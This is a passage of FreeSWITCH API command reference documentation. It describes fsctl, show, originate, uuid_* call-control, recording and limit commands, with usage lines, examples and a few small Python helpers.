resume Usage: fsctl resume [inbound|outbound]Resumes normal operation after pausing inbound, outbound, or both directions of call processing by FreeSWITCH.Example:fsctl resume inbound+OKResumes processing of inbound calls and registrations. Note that this command always returns +OK, but the same keyword must be used that corresponds to the one used in the pause command in order to take effect. save_history Usage: fsctl save_historyWrite out the command history in anticipation of executing a configuration that might crash FS. This is useful when debugging a new module or script to allow other developers to see what commands were executed before the crash. send_sighup Usage: fsctl send_sighupDoes the same thing that killing the FS process with -HUP would do without having to use the UNIX kill command. Useful in environments like Windows where there is no kill command or in cron or other scripts by using fs_cli -x \u0026ldquo;fsctl send_sighup\u0026rdquo; where the FS user process might not have privileges to use the UNIX kill command. shutdown Usage: fsctl shutdown [asap|asap restart|cancel|elegant|now|restart|restart asap|restart elegant]\ncancel - discontinue a previous shutdown request. elegant - wait for all traffic to stop, while allowing new traffic. asap - wait for all traffic to stop, but deny new traffic. now - shutdown FreeSWITCH immediately. restart - restart FreeSWITCH immediately following the shutdown. When giving \u0026ldquo;elegant\u0026rdquo;, \u0026ldquo;asap\u0026rdquo; or \u0026ldquo;now\u0026rdquo; it\u0026rsquo;s also possible to add the restart command: shutdown_check Usage: fsctl shutdown_checkReturns true if FS is shutting down, or shutting down and restarting. sps Usage: fsctl sps [int]This changes the sessions-per-second limit from the value initially set in switch.conf sync_clock Usage: fsctl sync_clockFreeSWITCH will not trust the system time. 
It gets one sample of system time when it first starts and uses the monotonic clock from that moment on. You can sync it back to the current value of the system's real-time clock with fsctl sync_clock.
Note: fsctl sync_clock takes effect immediately, which can affect the times on your CDRs. You can end up underbilling/overbilling, or even with calls hung up before they originated. E.g. if the FS clock is off by 1 month, then your CDRs will show calls that lasted for 1 month! See fsctl sync_clock_when_idle, which is much safer.

sync_clock_when_idle
Usage: fsctl sync_clock_when_idle
Synchronizes the FreeSWITCH clock to the host machine's real-time clock, but waits until there are 0 channels in use. That way it doesn't affect any CDRs.

verbose_events
Usage: fsctl verbose_events [on|off]
Enables verbose events. Verbose events have every channel variable in every event for a particular channel. Non-verbose events have only the pre-selected channel variables in the event headers. See switch.conf.xml for the persistent setting of verbose-channel-events.

global_getvar
Gets the value of a global variable. If the parameter is not provided then it gets all the global variables.
Usage: global_getvar [<var>]

global_setvar
Sets the value of a global variable.
Usage: global_setvar <var>=<value>
Example: global_setvar outbound_caller_id=2024561000

group_call
Returns the bridge string defined in a call group.
Usage: group_call group@domain[+F|+A|+E]
+F will return the group members in a serial fashion separated by | (the pipe character).
+A (default) will return them in a parallel fashion separated by , (comma).
+E will return them in an enterprise fashion separated by :_: (colon underscore colon).
There is no space between the domain and the optional flag.
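The three separator flags can be illustrated with a small helper that joins a member list the way group_call formats its bridge string. The member names are hypothetical; real dial strings come from the directory:

```python
def format_bridge_string(members, flag="+A"):
    """Join dial strings using the separator that each group_call flag implies."""
    separators = {
        "+F": "|",    # serial: try members one after another
        "+A": ",",    # parallel: ring all members at once (default)
        "+E": ":_:",  # enterprise: independent simultaneous originations
    }
    return separators[flag].join(members)

members = ["user/1001", "user/1002"]
print(format_bridge_string(members, "+F"))  # user/1001|user/1002
print(format_bridge_string(members))        # user/1001,user/1002
print(format_bridge_string(members, "+E"))  # user/1001:_:user/1002
```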
See Groups in the XML User Directory for more information.
Please note: If you need to have outgoing user variables set in leg B, make sure you don't have dial-string and group-dial-string in your domain or dialed group variables list; instead set dial-string or group-dial-string in the default group of the user. This way group_call will return user/101 and user/ would set all your user variables to the leg B channel. The B leg receives a new variable, dialed_group, containing the full group name.

help
Show help for all the API commands.
Usage: help

host_lookup
Performs a DNS lookup on a host name.
Usage: host_lookup <hostname>

hupall
Disconnect existing channels.
Usage: hupall <cause> [<var_name> <var_value>]
All channels with <var_name> set to <var_value> will be disconnected with the <cause> code.
Example:
originate {foo=bar}sofia/internal/someone1@server.com,sofia/internal/someone2@server.com &park
hupall normal_clearing foo bar
To hang up all calls on the switch indiscriminately:
hupall system_shutdown

in_group
Determine if a user is a member of a group.
Usage: in_group <user>[@<domain>] <group_name>

is_lan_addr
See if an IP is a LAN address.
Usage: is_lan_addr <ip>

json
JSON API
Usage: json {"command" : "...", "data" : "..."}
Example:
> json {"command" : "status", "data" : ""}
{"command":"status","data":"","status":"success","response":{"systemStatus":"ready","uptime":{"years":0,"days":20,"hours":20,"minutes":37,"seconds":4,"milliseconds":254,"microseconds":44},"version":"1.6.9 -16-d574870 64bit","sessions":{"count":{"total":132,"active":0,"peak":2,"peak5Min":0,"limit":1000},"rate":{"current":0,"max":30,"peak":2,"peak5Min":0}},"idleCPU":{"used":0,"allowed":99.733333},"stackSizeKB":{"current":240,"max":8192}}}

load
Load an external module.
Usage: load <mod_name>
Example: load mod_v8

md5
Return the MD5 hash for the given input data.
Usage: md5 hash-key
Example:
md5 freeswitch-is-awesome
765715d4f914bf8590d1142b6f64342e

module_exists
Check if a module is loaded.
Usage: module_exists <mod_name>
Example:
module_exists mod_event_socket
true

msleep
Sleep for x number of milliseconds.
Usage: msleep <milliseconds>

nat_map
Manage Network Address Translation mapping.
Usage: nat_map [status|reinit|republish] | [add|del] <port> [tcp|udp] [sticky] | [mapping] <enable|disable>
status - Gives the NAT type, the external IP, and the currently mapped ports.
reinit - Completely re-initializes the NAT engine.
Use this if you have changed routes or have changed your home router from NAT mode to UPnP mode.
republish - Causes FreeSWITCH to republish the NAT maps. This should not be necessary in normal operation.
mapping - Controls whether port mapping requests will be sent to the NAT (the command line option -nonatmap can set it to disabled on startup). This gives the ability to still use NAT for getting the public IP without opening the ports in the NAT.
Note: sticky makes the mapping persist across FreeSWITCH restarts, giving you a permanent mapping.
Warning: If you have multiple network interfaces with unique IP addresses defined in SIP profiles using the same port, nat_map will get confused when it tries to map the same ports for multiple profiles. Set up a static mapping between the public address and port and the private address and port in the sip_profiles to avoid this problem.

regex
Evaluate a regex (regular expression).
Usage: regex <source>|<pattern>[|<subst>][|(n|b)]
regex m:/<source>/<pattern>[/<subst>][/(n|b)]
regex m:~<source>~<pattern>[~<subst>][~(n|b)]
This command behaves differently depending upon whether or not a substitution string and optional flag are supplied:
If a subst is not supplied, regex returns either "true" if the pattern finds a match or "false" if not.
If a subst is supplied, regex returns the subst value on a true condition.
If a subst is supplied, on a false (no pattern match) condition regex returns: the source string with no flag; with the n flag regex returns null, which forces the response "-ERR no reply" from regex; with the b flag regex returns "false".
The regex delimiter defaults to the | (pipe) character.
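The match/substitution rules above can be mimicked in Python. This is a sketch of the documented return logic (pattern already split out of the delimited string), not the actual C implementation:

```python
import re

def fs_regex(source: str, pattern: str, subst: str = None, flag: str = None) -> str:
    """Approximate the return logic of the fs_cli `regex` command."""
    match = re.search(pattern, source)
    if subst is None:
        return "true" if match else "false"
    if match:
        # Replace $1, $2, ... with the captured groups.
        result = subst
        for i, group in enumerate(match.groups(), start=1):
            result = result.replace(f"${i}", group or "")
        return result
    # No match: behavior depends on the optional flag.
    if flag == "n":
        return "-ERR no reply"
    if flag == "b":
        return "false"
    return source

print(fs_regex("test1234", r"\d"))                     # true
print(fs_regex("test", r"\d"))                         # false
print(fs_regex("test1234", r"(\d+)", "$1"))            # 1234
print(fs_regex("sip:foo@bar.baz", r"^sip:(.*)", "$1")) # foo@bar.baz
print(fs_regex("30", r"^(10|20|40)$", "$1", "n"))      # -ERR no reply
```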
The delimiter may be changed to ~ (tilde) or / (forward slash) by prefixing the regex with m:
Examples:
regex test1234|\d  <== Returns "true"
regex m:/test1234/\d  <== Returns "true"
regex m:~test1234~\d  <== Returns "true"
regex test|\d  <== Returns "false"
regex test1234|(\d+)|$1  <== Returns "1234"
regex sip:foo@bar.baz|^sip:(.*)|$1  <== Returns "foo@bar.baz"
regex testingonetwo|(\d+)|$1  <== Returns "testingonetwo" (no match)
regex m:~30~/^(10|20|40)$/~$1  <== Returns "30" (no match)
regex m:~30~/^(10|20|40)$/~$1~n  <== Returns "-ERR no reply" (no match)
regex m:~30~/^(10|20|40)$/~$1~b  <== Returns "false" (no match)
Per the logic in revision 14727: if the source string equals the result, the condition was false; here, however, there was a match and the result is 1001.
regex 1001|/(^\d{4}$)/|$1
See also Regular_Expression.

reload
Reload a module.
Usage: reload <mod_name>

reloadacl
Reload Access Control Lists after modifying them in autoload_configs/acl.conf.xml and as defined in extensions in the user directory conf/directory/*.xml.
Usage: reloadacl [reloadxml]

reloadxml
Reload conf/freeswitch.xml settings after modifying configuration files.
Usage: reloadxml

show
Display various reports, VERY useful for troubleshooting and confirming proper configuration of FreeSWITCH.
Arguments cannot be abbreviated; they must be specified fully.
Usage: show [ aliases | api | application | bridged_calls | calls [count] | channels [count|like <match>] | chat | codec | complete | detailed_bridged_calls | detailed_calls | dialplan | endpoint | file | interface_types | interfaces | limits | management | modules | nat_map | registrations | say | tasks | timer ] [as xml|as delim <delimiter>]
XML formatted: show foo as xml
Change delimiter: show foo as delim |
aliases – list defined command aliases
api – list API commands exposed by loadable modules
application – list applications exposed by loadable modules, notably mod_dptools
bridged_calls – deprecated, use "show calls"
calls [count] – list details of currently active calls; the keyword "count" eliminates the details and only prints the total count of calls
channels [count|like <match>] – list current channels; see Channels vs Calls
count – show only the count of active channels, no details
like <match> – filter results to include only channels that contain <match> in the uuid, channel name, cid_number, cid_name, or presence data fields.
chat – list chat interfaces
codec – list codecs that are currently loaded in FreeSWITCH
complete – list command argument completion tables
detailed_bridged_calls – same as "show detailed_calls"
detailed_calls – like "show calls" but with more fields
dialplan – list dialplan interfaces
endpoint – list endpoint interfaces currently available to FS
file – list supported file format interfaces
interface_types – list all interface types with a summary count of each type of interface available
interfaces – enumerate all available interfaces by type, showing the module which exposes each interface
limits – list database limit interfaces
management – list management interfaces
module – enumerate modules and the path to each
nat_map – list Network Address Translation map
registrations – enumerate user extension registrations
say – enumerate available TTS (text-to-speech) interface modules with languages supported
tasks – list FS tasks
timer – list timer modules

Tips For Showing Calls and Channels
The best way to get an understanding of all of the show calls/channels variants is to use them and observe the results. To display more fields:
show detailed_calls
show bridged_calls
show detailed_bridged_calls
These three expand on the information shown by "show calls". Note that "show detailed_calls" replaces "show distinct_channels". It provides similar, but more detailed, information.
Also note that there is no "show detailed_channels" command; however, using "show detailed_calls" will yield the same net result: FreeSWITCH lists detailed information about one-legged calls and bridged calls, which can be quite useful while configuring and troubleshooting FS.
Filtering Results
To filter only channels matching a specific uuid or related to a specific call, set the presence_data channel variable in the bridge or originate application to a unique string. Then you can use:
show channels like foo
to list only those channels of interest. The like directive filters on these fields:
uuid
channel name
caller id name
caller id number
presence_data
NOTE: presence_data must be set during bridge or originate and not after the channel is established.

shutdown
Stop the FreeSWITCH program.
Usage: shutdown
This only works from the console. To shut down FS from an API call or fs_cli, use "fsctl shutdown", which offers a number of options. Shutdown from the console ignores arguments and exits immediately!

status
Show current FS status. Very helpful information to provide when asking questions on the mailing list or IRC channel.
Usage: status
freeswitch@internal> status
UP 17 years, 20 days, 10 hours, 10 minutes, 31 seconds, 571 milliseconds, 721 microseconds
FreeSWITCH (Version 1.5.8b git 87751f9 2013-12-13 18:13:56Z 32bit) is ready
53987253 session(s) since startup
127 session(s) - peak 127, last 5min 253
55 session(s) per Sec out of max 60, peak 55, last 5min 253
1000 session(s) max
min idle cpu 0.00/97.71

strftime_tz
Displays formatted time, converted to a specific timezone.
See /usr/share/zoneinfo/zone.tab for the standard list of Linux timezones.
Usage: strftime_tz <timezone> [format_string]
Example: strftime_tz US/Eastern %Y-%m-%d %T

unload
Unload an external module.
Usage: unload <mod_name>

version
Show the version of the switch.
Usage: version [short]
Examples:
freeswitch@internal> version
FreeSWITCH Version 1.5.8b+git~20131213T181356Z~87751f9eaf~32bit (git 87751f9 2013-12-13 18:13:56Z 32bit)
freeswitch@internal> version short
1.5.8b

xml_locate
Write the active XML tree or a specified branch to stdout.
Usage: xml_locate [root | <section> | <section> <tag> <tag_attr_name> <tag_attr_val>]
xml_locate root will return all XML being used by FreeSWITCH.
xml_locate <section> will return the XML corresponding to the specified section:
xml_locate directory
xml_locate configuration
xml_locate dialplan
xml_locate phrases
Example:
xml_locate directory domain name example.com
xml_locate configuration configuration name ivr.conf

xml_wrap
Wrap another API command in XML.
Usage: xml_wrap <command> <args>

Call Management Commands

break
Deprecated. See uuid_break.

create_uuid
Creates a new UUID and returns it as a string.
Usage: create_uuid

originate
Originate a new call.
Usage: originate <call_url> <exten>|&<application_name>(<app_args>) [<dialplan>] [<context>] [<cid_name>] [<cid_num>] [<timeout_sec>]
FreeSWITCH will originate a call to <call_url> as Leg A. If that leg supervises within 60 seconds, FS will continue by searching for an extension definition for <exten> in the specified dialplan, or else execute the application that follows the & along with its arguments.

Originate Arguments
<call_url> URL you are calling.
For more info on sofia SIP URL syntax see: FreeSwitch Endpoint Sofia
<exten> Destination, one of:
Destination number to search in the dialplan; note that registered extensions will fail this way, use &bridge(user/xxxx) instead
&<application_name>(<app_args>)
"&" indicates what follows is an application name, not an exten
(<app_args>) is optional (not all applications require parameters, e.g. park)
The most commonly used application names include: park, bridge, javascript/lua/perl, playback (remove mod_native_file).
Note: Use single quotes to pass arguments with spaces, e.g. '&lua(test.lua arg1 arg2)'
Note: There is no space between & and the application name
<dialplan> Defaults to 'XML' if not specified.
<context> Defaults to 'default' if not specified.
<cid_name> CallerID name to send to Leg A.
<cid_num> CallerID number to send to Leg A.
<timeout_sec> Timeout in seconds; default = 60 seconds.

Originate Variables
These variables can be prepended to the dial string inside curly braces and separated by commas. Example:
originate {sip_auto_answer=true,return_ring_ready=false}user/1001 9198
Variables within braces must be separated by a comma.
group_confirm_key
group_confirm_file
forked_dial
fail_on_single_reject
ignore_early_media - must be defined on Leg B in bridge or originate command to stop remote ringback from being heard by Leg A
return_ring_ready
originate_retries
originate_retry_sleep_ms
origination_caller_id_name
origination_caller_id_number
originate_timeout
sip_auto_answer
See the description of originate's related variables.

Originate Examples
You can call a locally registered SIP endpoint 300 and park the call like so. Note that the "example" profile used here must be the one to which 300 is registered.
Also note the use of % instead of @ to indicate that it is a registered extension.
originate sofia/example/300%pbx.internal &park()
Or you could instead connect a remote SIP endpoint to extension 8600:
originate sofia/example/300@foo.com 8600
Or you could instead connect a remote SIP endpoint to another remote extension:
originate sofia/example/300@foo.com &bridge(sofia/example/400@bar.com)
Or you could even run a JavaScript application test.js:
originate sofia/example/1000@somewhere.com &javascript(test.js)
To run a JavaScript with arguments you must surround it in single quotes:
originate sofia/example/1000@somewhere.com '&javascript(test.js myArg1 myArg2)'
Setting channel variables in the dial string:
originate {ignore_early_media=true}sofia/mydomain.com/18005551212@1.2.3.4 15555551212
Setting SIP header variables to send to another FS box during originate:
originate {sip_h_X-varA=111,sip_h_X-varB=222}sofia/mydomain.com/18005551212@1.2.3.4 15555551212
Note: you can set any channel variable, even custom ones.
Use single quotes to enclose values with spaces, commas, etc.
originate {my_own_var=my_value}sofia/mydomain.com/that.ext@1.2.3.4 15555551212
originate {my_own_var='my value'}sofia/mydomain.com/that.ext@1.2.3.4 15555551212
If you need to fake the ringback to the originated endpoint try this:
originate {ringback='%(2000,4000,440.0,480.0)'}sofia/example/300@foo.com &bridge(sofia/example/400@bar.com)
To specify a parameter to the Leg A call and the Leg B bridge application:
originate {'origination_caller_id_number=2024561000'}sofia/gateway/whitehouse.gov/2125551212 &bridge(['effective_caller_id_number=7036971379']sofia/gateway/pentagon.gov/3035554499)
If you need originate to return immediately when the channel is in "Ring-Ready" state, try this:
originate {return_ring_ready=true}sofia/gateway/someprovider/919246461929 &socket('127.0.0.1:8082 async full')
More info on return_ring_ready.
You can even set music on hold for the ringback if you want:
originate {ringback='/path/to/music.wav'}sofia/gateway/name/number &bridge(sofia/gateway/siptoshore/12425553741)
You can originate a call in the background (asynchronously) and play back a message with a 60 second timeout:
bgapi originate {ignore_early_media=true,originate_timeout=60}sofia/gateway/name/number &playback(message)
You can specify the UUID of an originated call by doing the following:
Use create_uuid to generate a UUID to use. This will allow you to kill an originated call before it is answered by using uuid_kill. If you specify origination_uuid it will remain the UUID for the answered call leg for the whole session.
originate {origination_uuid=...}user/100@domain.name.com
Here's an example of originating a call to the echo conference (an external SIP URL) and bridging it to a local user's phone:
originate sofia/internal/9996@conference.freeswitch.org &bridge(user/105@default)
Here's an example of originating a call to an extension in a different context than 'default' (required for the FreePBX which uses context_1, context_2, etc.):
originate sofia/internal/2001@foo.com 3001 xml context_3
You can also originate to multiple extensions as follows:
originate user/1001,user/1002,user/1003 &park()
To put an outbound call into a conference at early media, either of these will work (they are effectively the same thing):
originate sofia/example/300@foo.com &conference(conf_uuid-TEST_CON)
originate sofia/example/300@foo.com conference:conf_uuid-TEST_CON inline
See mod_dptools: Inline Dialplan for more detail on 'inline' dialplans. An example of using loopback and inline on the A-leg can be found in this mailing list post.

pause
Pause playback of recorded media that was started with uuid_broadcast.
Usage: pause <uuid> <on|off>
Turning pause "on" activates the pause function, i.e. it pauses the playback of recorded media. Turning pause "off" deactivates the pause function and resumes playback of recorded media at the same point where it was paused.
Note: always returns -ERR no reply when successful; returns -ERR No such channel! when the uuid is invalid.
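Since create_uuid returns a standard UUID string, a script driving FreeSWITCH can equally generate one client-side and pass it as origination_uuid, so the call's UUID is known before originate returns. A minimal sketch; the dial string is a placeholder:

```python
import uuid

# Generate the UUID up front, as create_uuid would.
call_uuid = str(uuid.uuid4())

# Build an originate command that pins the A-leg UUID, so the call can later
# be targeted with uuid_kill / uuid_transfer even before it is answered.
cmd = f"originate {{origination_uuid={call_uuid}}}user/100@domain.name.com &park()"
print(cmd)
```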
uuid_answer
Answer a channel.
Usage: uuid_answer <uuid>
See Also: mod_dptools: answer

uuid_audio
Adjust the audio levels on a channel or mute (read/write) via a media bug.
Usage: uuid_audio <uuid> [start [read|write] [[mute|level] <level>]|stop]
<level> is in the range from -4 to 4, 0 being the default value.
A level is required for both the mute and level params:
freeswitch@internal> uuid_audio 0d7c3b93-a5ae-4964-9e4d-902bba50bd19 start write mute <level>
freeswitch@internal> uuid_audio 0d7c3b93-a5ae-4964-9e4d-902bba50bd19 start write level <level>
(This command behaves funky. Requires further testing to vet all arguments. - JB)
See Also: mod_dptools: set audio level

uuid_break
Break out of media being sent to a channel. For example, if an audio file is being played to a channel, issuing uuid_break will discontinue the media and the call will move on in the dialplan, script, or whatever is controlling the call.
Usage: uuid_break <uuid> [all]
If the all flag is used then all audio files/prompts/etc. that are queued up to be played to the channel will be stopped and removed from the queue; otherwise only the currently playing media will be stopped.

uuid_bridge
Bridge two call legs together.
Usage: uuid_bridge <uuid> <other_uuid>
uuid_bridge needs at least one leg to be in the answered state. If, for example, one channel is parked and another channel is actively conversing on a call, executing uuid_bridge on these 2 channels will drop the existing call and bridge together the specified channels.

uuid_broadcast
Execute an arbitrary dialplan application, typically playing a media file, on a specific uuid. If a filename is specified then it is played into the channel(s).
To execute an application use "app::args" syntax.
Usage: uuid_broadcast <uuid> <path> [aleg|bleg|both]
Execute an application on a chosen leg(s) with optional hangup afterwards:
Usage: uuid_broadcast <uuid> app[![hangup_cause]]::args [aleg|bleg|both]
Examples:
uuid_broadcast 336889f2-1868-11de-81a9-3f4acc8e505e sorry.wav both
uuid_broadcast 336889f2-1868-11de-81a9-3f4acc8e505e say::en\snumber\spronounced\s12345 aleg
uuid_broadcast 336889f2-1868-11de-81a9-3f4acc8e505e say!::en\snumber\spronounced\s12345 aleg
uuid_broadcast 336889f2-1868-11de-81a9-3f4acc8e505e say!user_busy::en\snumber\spronounced\s12345 aleg
uuid_broadcast 336889f2-1868-11de-81a9-3f4acc8e505e playback!user_busy::sorry.wav aleg

uuid_buglist
List the media bugs on a channel. Output is formatted as XML.
Usage: uuid_buglist <uuid>

uuid_chat
Send a chat message.
Usage: uuid_chat <uuid> <text>
If the endpoint associated with the session has a receive_event handler, this message gets sent to that session and is interpreted as an instant message.

uuid_debug_media
Debug media, either audio or video.
Usage: uuid_debug_media <uuid> <read|write|both|vread|vwrite|vboth> <on|off>
Use "read" or "write" for the audio direction to debug, or "both" for both directions. Prefix with v for video media.
uuid_debug_media emits a HUGE amount of data.
If you invoke this command from fs_cli, be prepared.
Example output:
R sofia/internal/1003@192.168.65.3 b= 172 192.168.65.3:17668 192.168.65.114:16072 192.168.65.114:16072 pt=0 ts=2981605109 m=0
W sofia/internal/1003@192.168.65.3 b= 172 192.168.65.3:17668 192.168.65.114:16072 192.168.65.114:16072 pt=0 ts=12212960 m=0
R sofia/internal/1003@192.168.65.3 b= 172 192.168.65.3:17668 192.168.65.114:16072 192.168.65.114:16072 pt=0 ts=2981605269 m=0
W sofia/internal/1003@192.168.65.3 b= 172 192.168.65.3:17668 192.168.65.114:16072 192.168.65.114:16072 pt=0 ts=12213120 m=0
Read Format: "R %s b=%4ld %s:%u %s:%u %s:%u pt=%d ts=%u m=%d\n"
where the values are:
switch_channel_get_name(switch_core_session_get_channel(session)), (long) bytes, my_host, switch_sockaddr_get_port(rtp_session->local_addr), old_host, rtp_session->remote_port, tx_host, switch_sockaddr_get_port(rtp_session->from_addr), rtp_session->recv_msg.header.pt, ntohl(rtp_session->recv_msg.header.ts), rtp_session->recv_msg.header.m
Write Format: "W %s b=%4ld %s:%u %s:%u %s:%u pt=%d ts=%u m=%d\n"
where the values are:
switch_channel_get_name(switch_core_session_get_channel(session)), (long) bytes, my_host, switch_sockaddr_get_port(rtp_session->local_addr), old_host, rtp_session->remote_port, tx_host, switch_sockaddr_get_port(rtp_session->from_addr), send_msg->header.pt, ntohl(send_msg->header.ts), send_msg->header.m

uuid_deflect
Deflect an answered SIP call off of FreeSWITCH by sending the REFER method.
Usage: uuid_deflect <uuid> <sip_url>
uuid_deflect waits for the final response from the far end to be reported. It returns the SIP fragment from that response as the text in the FreeSWITCH response to uuid_deflect.
If the far end reports that the REFER was successful, then FreeSWITCH will issue a BYE on the channel.
Example:
uuid_deflect 0c9520c4-58e7-40c4-b7e3-819d72a98614 sip:info@example.net
Response:
Content-Type: api/response
Content-Length: 30
+OK:SIP/2.0 486 Busy Here

uuid_displace
Displace the audio for the target <uuid> with the specified audio <file>.
Usage: uuid_displace <uuid> [start|stop] <file> [<limit>] [mux]
Arguments:
uuid = Unique ID of this call (see 'show channels')
start|stop = Start or stop this action
file = path to an audio source (.wav file, shoutcast stream, etc...)
limit = limit number of seconds before terminating the displacement
mux = multiplex; mix the original audio together with 'file', i.e. both parties can still converse while the file is playing (if the level is not too loud)
To specify the 5th argument 'mux' you must specify a limit; if no time limit is desired on playback, then specify 0.
Examples:
cli> uuid_displace 1a152be6-2359-11dc-8f1e-4d36f239dfb5 start /sounds/test.wav 60
cli> uuid_displace 1a152be6-2359-11dc-8f1e-4d36f239dfb5 stop /sounds/test.wav

uuid_display
Updates the display on a phone if the phone supports this. This works on some SIP phones right now, including Polycom and Snom.
Usage: uuid_display <uuid> name|number
Note the pipe character separating the Caller ID name and Caller ID number.
This command makes the phone re-negotiate the codec. The SIP -> RTP Packet Size should be 0.020 seconds. If it is set to 0.030 on the Cisco SPA series phones it causes a DTMF lag.
When DTMF keys are pressed on the phone they can be seen on the fs_cli 4-6 seconds late.
Example:
freeswitch@sidious> uuid_display f4053af7-a3b9-4c78-93e1-74e529658573 Fred Jones|1001
+OK Success

uuid_dual_transfer
Transfer each leg of a call to different destinations.
Usage: uuid_dual_transfer <uuid> <dest-a>[/<dialplan>][/<context>] <dest-b>[/<dialplan>][/<context>]

uuid_dump
Dumps all variable values for a session.
Usage: uuid_dump <uuid> [format]
Format options: txt (default, may be omitted), XML, JSON, plain

uuid_early_ok
Stops the process of ignoring early media, i.e. if ignore_early_media=true, this stops ignoring early media coming from Leg B and responds normally.
Usage: uuid_early_ok <uuid>

uuid_exists
Checks whether a given UUID exists.
Usage: uuid_exists <uuid>
Returns true or false.

uuid_flush_dtmf
Flush queued DTMF digits.
Usage: uuid_flush_dtmf <uuid>

uuid_fileman
Manage the audio being played into a channel from a sound file.
Usage: uuid_fileman <uuid> cmd:val
Commands are:
speed:<+[step]>|<-[step]>
volume:<+[step]>|<-[step]>
pause (toggle)
stop
truncate
restart
seek:<+[milliseconds]>|<-[milliseconds]> (1000ms = 1 second, 10000ms = 10 seconds.)
Example to seek forward 30 seconds:
uuid_fileman 0171ded1-2c31-445a-bb19-c74c659b7d08 seek:+30000
(Or use the current channel via ${uuid}, e.g. in a bind_digit_action.)
The 'pause' argument is a toggle: the first time it is invoked it will pause playback, the second time it will resume playback.

uuid_getvar
Get a variable from a channel.
Usage: uuid_getvar <uuid> <varname>

uuid_hold
Place a channel on hold.
Usage:
uuid_hold <uuid> - place a call on hold
uuid_hold off <uuid> - switch off hold
uuid_hold toggle <uuid> - toggles call-state based on current call-state

uuid_kill
Reset a specific channel.
Usage: uuid_kill <uuid> [cause]
If no cause code is specified, NORMAL_CLEARING will be used.
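uuid_fileman's cmd:val arguments follow a simple pattern. A hypothetical parser (not part of FreeSWITCH) shows how the values are read: milliseconds for seek, signed relative steps for speed and volume, and bare keywords for pause/stop/truncate/restart:

```python
def parse_fileman(arg: str):
    """Split a uuid_fileman argument like 'seek:+30000' into (command, value).

    Commands without a value (pause, stop, truncate, restart) return None
    for the value part.
    """
    cmd, sep, val = arg.partition(":")
    if not sep:
        return cmd, None
    # seek values are milliseconds; speed/volume are signed steps.
    return cmd, int(val)

print(parse_fileman("seek:+30000"))  # ('seek', 30000)
print(parse_fileman("volume:-1"))    # ('volume', -1)
print(parse_fileman("pause"))        # ('pause', None)
```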
uuid_limit
Apply or change limit(s) on a specified uuid.
Usage: uuid_limit <uuid> <backend> <realm> <resource> [<max>[/interval]] [number [dialplan [context]]]
See also mod_dptools: Limit

uuid_media
Reinvite FreeSWITCH out of the media path:
Usage: uuid_media off <uuid>
Reinvite FreeSWITCH back in:
Usage: uuid_media <uuid>

uuid_media_reneg
Tell a channel to send a re-invite with an optional list of new codecs to be renegotiated.
Usage: uuid_media_reneg <uuid> <=><codec_string>
Example: Adding =PCMU makes the offered codec string absolute.

uuid_park
Park a call.
Usage: uuid_park <uuid>
The specified channel will be parked and the other leg of the call will be disconnected.

uuid_pre_answer
Pre-answer a channel.
Usage: uuid_preanswer <uuid>
See Also: Misc._Dialplan_Tools_pre_answer

uuid_preprocess
Pre-process a channel.
Usage: uuid_preprocess <uuid>

uuid_recv_dtmf
Usage: uuid_recv_dtmf <uuid> <dtmf_data>

uuid_send_dtmf
Send DTMF digits to <uuid>.
Usage: uuid_send_dtmf <uuid> <digits>[@<tone_duration>]
Use the character w for a .5 second delay and the character W for a 1 second delay. Default tone duration is 2000ms.

uuid_send_info
Send info to the endpoint.
Usage: uuid_send_info <uuid>

uuid_session_heartbeat
Usage: uuid_session_heartbeat <uuid> [sched] [0|<seconds>]

uuid_setvar
Set a variable on a channel. If the value is omitted, the variable is unset.
Usage: uuid_setvar <uuid> <varname> [value]

uuid_setvar_multi
Set multiple vars on a channel.
Usage: uuid_setvar_multi <uuid> <varname>=<value>[;<varname>=<value>[;...]]

uuid_simplify
This command directs FreeSWITCH to remove itself from the SIP signaling path if it can safely do so.
Usage: uuid_simplify <uuid>
Execute this API command to instruct FreeSWITCH™ to inspect the Leg A and Leg B network addresses. If they are both hosted by the same switch, as a result of a transfer or forwarding loop across a number of FreeSWITCH™ systems, the one executing this command will remove itself from the SIP and media path and restore the endpoints to their local FreeSWITCH™ to shorten the network path.
This is particularly useful in large distributed FreeSWITCH™ installations. For example, suppose a call arrives at a FreeSWITCH™ box in Los Angeles, is answered, then forwarded to a FreeSWITCH™ box in London, answered there and then forwarded back to Los Angeles. The London switch could execute uuid_simplify to tell its local switch to examine both legs of the call and determine that they could be hosted by the Los Angeles switch, since both legs are local to it. Alternatively, setting sip_auto_simplify to true, either globally in vars.xml or as part of a dialplan extension, would tell FS to perform this check for each call when both legs supervise.

uuid_transfer
Transfers an existing call to a specific extension within a <dialplan> and <context>. Dialplan may be "xml" or "directory".
Usage: uuid_transfer <uuid> [-bleg|-both] <dest-exten> [<dialplan>] [<context>]
The optional first argument will allow you to transfer both parties (-both) or only the party to whom <uuid> is talking (-bleg). Beware that -bleg actually means "the other leg", so when it is executed on the actual B leg uuid it will transfer the actual A leg that originated the call and disconnect the actual B leg.
NOTE: if the call has been bridged, and you want to transfer either side of the call, then you will need to set park_after_bridge=true (or the API equivalent). If it's not set, transfer doesn't really work as you'd expect, and leaves calls in limbo.
For more examples see Inline Dialplan.

uuid_phone_event
Send a hold indication upstream:
Usage: uuid_phone_event <uuid> hold|talk

Record/Playback Commands

uuid_record
Record the audio associated with the given UUID into a file. The start command causes FreeSWITCH to start mixing all call legs together and saves the result as a file in the format that the file's extension dictates (if available). The stop command will stop the recording and close the file.
If media setup hasn\u0026rsquo;t yet happened, the file will contain silent audio until media is available. Audio will be recorded for calls that are parked. The recording will continue through the bridged call. If the call is set to return to park after the bridge, the bug will remain on the call, but no audio is recorded until the call is bridged again. (TODO: What if media doesn\u0026rsquo;t flow through FreeSWITCH? Will it re-INVITE first? Or do we just not get the audio in that case?)Usage:uuid_record [start|stop|mask|unmask] []Where limit is the max number of seconds to record.If the path is not specified on start it will default to the channel variable \u0026ldquo;sound_prefix\u0026rdquo; or FreeSWITCH base_dir when the \u0026ldquo;sound_prefix\u0026rdquo; is empty.You may also specify \u0026ldquo;all\u0026rdquo; for path when stop is used to remove all recordings for this uuid. The \u0026ldquo;stop\u0026rdquo; command must be followed by the path option.\u0026ldquo;mask\u0026rdquo; will mask part of the recording with silence, beginning when the mask argument is executed by this command; see http://jira.freeswitch.org/browse/FS-5269.\u0026ldquo;unmask\u0026rdquo; will stop the masking and continue recording live audio normally.See record\u0026rsquo;s related variables; you will also want to see mod_dptools: record_session Limit Commands More information is available at Limit commands limit_reset Reset a limit backend. limit_status Retrieve status from a limit backend. limit_usage Retrieve usage for a given resource. uuid_limit_release Manually decrease a resource usage 